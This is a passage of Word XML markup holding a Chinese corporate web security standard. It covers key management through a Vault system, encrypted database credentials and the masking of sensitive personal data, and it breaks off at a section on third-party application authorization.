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E6E" w:rsidRPr="00C26930" w:rsidRDefault="004153E9" w:rsidP="002C2CA5">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C26930">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>目的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004153E9" w:rsidRPr="00C26930" w:rsidRDefault="004153E9" w:rsidP="00B511DA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C26930">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C26930">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>制定小企业</w:t>
      </w:r>
      <w:r w:rsidRPr="00C26930">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="00C26930">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>安全规范标准的目的是让开发、测试、项目经理等团队里各种角色人员对各种</w:t>
      </w:r>
      <w:r w:rsidRPr="00C26930">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="00C26930">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>安全漏洞的产生原理、攻击手段有更深入的了解，并提供各种漏洞的修补方案，以便</w:t>
      </w:r>
      <w:r w:rsidR="003A7F26" w:rsidRPr="00C26930">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>在整个项目的生命周期里能够加强安全开发的意识尽可能减少可能存在的</w:t>
      </w:r>
      <w:r w:rsidR="003D60D9" w:rsidRPr="00C26930">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>安全隐患，从而慢慢形成符合小企业技术文化氛围的</w:t>
      </w:r>
      <w:r w:rsidR="003D60D9" w:rsidRPr="00C26930">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>SDL</w:t>
      </w:r>
      <w:r w:rsidR="003D60D9" w:rsidRPr="00C26930">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA55FF" w:rsidRPr="00C26930" w:rsidRDefault="00A27972" w:rsidP="00A27972">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C26930">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>术语</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00753309" w:rsidRPr="00C26930" w:rsidRDefault="003D60D9" w:rsidP="00657A62">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C26930">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C26930">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
        </w:rPr>
        <w:t>SDL</w:t>
      </w:r>
      <w:r w:rsidRPr="00C26930">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>: Security Development Lifecycle</w:t>
      </w:r>
      <w:r w:rsidRPr="00C26930">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>的简称，安全开发生命周期</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D050D4" w:rsidRPr="00C26930" w:rsidRDefault="00D050D4" w:rsidP="00657A62">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C26930">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C26930">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
        </w:rPr>
        <w:t>KMS</w:t>
      </w:r>
      <w:r w:rsidRPr="00C26930">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>: Key Management System</w:t>
      </w:r>
      <w:r w:rsidRPr="00C26930">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>的简称，密钥管理系统</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D050D4" w:rsidRPr="00C26930" w:rsidRDefault="00D050D4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00753309" w:rsidRPr="00C26930" w:rsidRDefault="00753309" w:rsidP="00753309">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C26930">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>数据安全</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003671ED" w:rsidRPr="00C26930" w:rsidRDefault="003671ED" w:rsidP="00C43F3A">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>密钥</w:t>
      </w:r>
      <w:r w:rsidR="008925B1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安全</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00753309" w:rsidRDefault="00534D2A" w:rsidP="00667207">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>密钥是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>所有需要加密业务的核心，因此密钥本身怎么进行管理和存储比怎么加密更为重要。</w:t>
      </w:r>
      <w:r w:rsidR="008925B1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Va</w:t>
      </w:r>
      <w:r w:rsidR="008925B1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>ult</w:t>
      </w:r>
      <w:r w:rsidR="008925B1" w:rsidRPr="008925B1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidR="008925B1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>税友集团</w:t>
      </w:r>
      <w:r w:rsidR="00667207">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidR="00667207">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>端技术委员会</w:t>
      </w:r>
      <w:r w:rsidR="00667207">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>正在</w:t>
      </w:r>
      <w:r w:rsidR="00667207">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>推广</w:t>
      </w:r>
      <w:r w:rsidR="008925B1" w:rsidRPr="008925B1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的密钥管理系统，为众多核心业务提供密</w:t>
      </w:r>
      <w:r w:rsidR="00667207">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>匙管理服务，</w:t>
      </w:r>
      <w:r w:rsidR="008925B1" w:rsidRPr="008925B1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其主要负责密钥的存储、使用、分发、更新等</w:t>
      </w:r>
      <w:r w:rsidR="00C7704D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="00667207">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Vault</w:t>
      </w:r>
      <w:r w:rsidR="00667207" w:rsidRPr="00667207">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的设计与管理满足行业合规性及审计要求</w:t>
      </w:r>
      <w:r w:rsidR="004157FE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE4860" w:rsidRPr="00667207" w:rsidRDefault="00BE4860" w:rsidP="008925B1">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00667207">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>生产</w:t>
      </w:r>
      <w:r w:rsidR="00667207" w:rsidRPr="00667207">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>环境</w:t>
      </w:r>
      <w:r w:rsidR="00667207" w:rsidRPr="00667207">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidR="00667207" w:rsidRPr="00667207">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>所有业务系统</w:t>
      </w:r>
      <w:r w:rsidR="00395A44" w:rsidRPr="00667207">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>原则上</w:t>
      </w:r>
      <w:r w:rsidR="00667207" w:rsidRPr="00667207">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>如果需要使用密钥，</w:t>
      </w:r>
      <w:r w:rsidR="00FA31AB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>首先需要向运维</w:t>
      </w:r>
      <w:r w:rsidR="00FA31AB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>部门申请</w:t>
      </w:r>
      <w:r w:rsidR="00BA734F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>通过，然后</w:t>
      </w:r>
      <w:r w:rsidR="00667207" w:rsidRPr="00667207">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>由</w:t>
      </w:r>
      <w:r w:rsidR="00667207" w:rsidRPr="00667207">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Vault</w:t>
      </w:r>
      <w:r w:rsidR="00667207" w:rsidRPr="00667207">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>进行存储</w:t>
      </w:r>
      <w:r w:rsidR="00667207" w:rsidRPr="00667207">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>、管理以及授权。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00753309" w:rsidRDefault="00753309">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008925B1" w:rsidRPr="00C26930" w:rsidRDefault="008925B1" w:rsidP="00534D2A">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>密码安全</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE4860" w:rsidRDefault="00BE4860" w:rsidP="00BE4860">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>数据库</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>明文密码加密对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>开发</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>人员而言应该是透明，不能够接触到明文密码。</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE4860">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>确保阿里云所有与数据库相关的认证信息都需要提供安全加密措施，不能将明文直接存储在配置文件或直接写死在代码中。</w:t>
      </w:r>
      <w:r w:rsidRPr="006C3319">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>原则上，税友</w:t>
      </w:r>
      <w:r w:rsidRPr="006C3319">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>集团</w:t>
      </w:r>
      <w:r w:rsidRPr="006C3319">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>内管以及</w:t>
      </w:r>
      <w:r w:rsidRPr="006C3319">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>阿里云</w:t>
      </w:r>
      <w:r w:rsidRPr="006C3319">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>生产</w:t>
      </w:r>
      <w:r w:rsidRPr="006C3319">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>环境上所有新立项项目必须接</w:t>
      </w:r>
      <w:r w:rsidRPr="006C3319">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>入</w:t>
      </w:r>
      <w:r w:rsidRPr="006C3319">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Vault</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008925B1" w:rsidRDefault="008925B1" w:rsidP="009E39E4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009E39E4" w:rsidRPr="00C26930" w:rsidRDefault="009E39E4" w:rsidP="009E39E4">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据</w:t>
      </w:r>
      <w:r>
        <w:t>脱敏</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C74FD" w:rsidRPr="004C74FD" w:rsidRDefault="004C74FD" w:rsidP="004C74FD">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C74FD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户敏感数据禁止直接展示，必须对展示数据进行脱敏。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E39E4" w:rsidRDefault="004C74FD" w:rsidP="004C74FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C74FD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>说明：查看个人手机号码会显示成</w:t>
      </w:r>
      <w:r w:rsidRPr="004C74FD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:158****9119</w:t>
      </w:r>
      <w:r w:rsidRPr="004C74FD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，隐藏中间</w:t>
      </w:r>
      <w:r w:rsidRPr="004C74FD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4 </w:t>
      </w:r>
      <w:r w:rsidRPr="004C74FD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>位，防止隐私泄露。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E39E4" w:rsidRPr="00726579" w:rsidRDefault="004C74FD" w:rsidP="004C74FD">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C74FD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>生产环境</w:t>
      </w:r>
      <w:r w:rsidRPr="004C74FD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>敏感数据</w:t>
      </w:r>
      <w:r w:rsidRPr="004C74FD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>转移至</w:t>
      </w:r>
      <w:r w:rsidRPr="004C74FD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>测试、开发环境或者大数据平台，</w:t>
      </w:r>
      <w:r w:rsidRPr="004C74FD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>必须</w:t>
      </w:r>
      <w:r w:rsidRPr="004C74FD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>保留业务数据有效性的同时，隐藏敏感信息</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00726579" w:rsidRDefault="00726579" w:rsidP="00726579">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>说明</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="008A2306">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个税</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>批量申报数据拉取至线下</w:t>
      </w:r>
      <w:r w:rsidR="008A2306">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>环境</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>时</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，必须</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>对申报自然人信息</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的证件号</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>、手机号、姓名做一定的转换</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B671A3" w:rsidRDefault="00B671A3" w:rsidP="00726579">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B671A3" w:rsidRPr="00C26930" w:rsidRDefault="00B671A3" w:rsidP="00B671A3">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第三方应用授权</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B671A3" w:rsidRDefault="00B671A3" w:rsidP="00B671A3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第三方</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
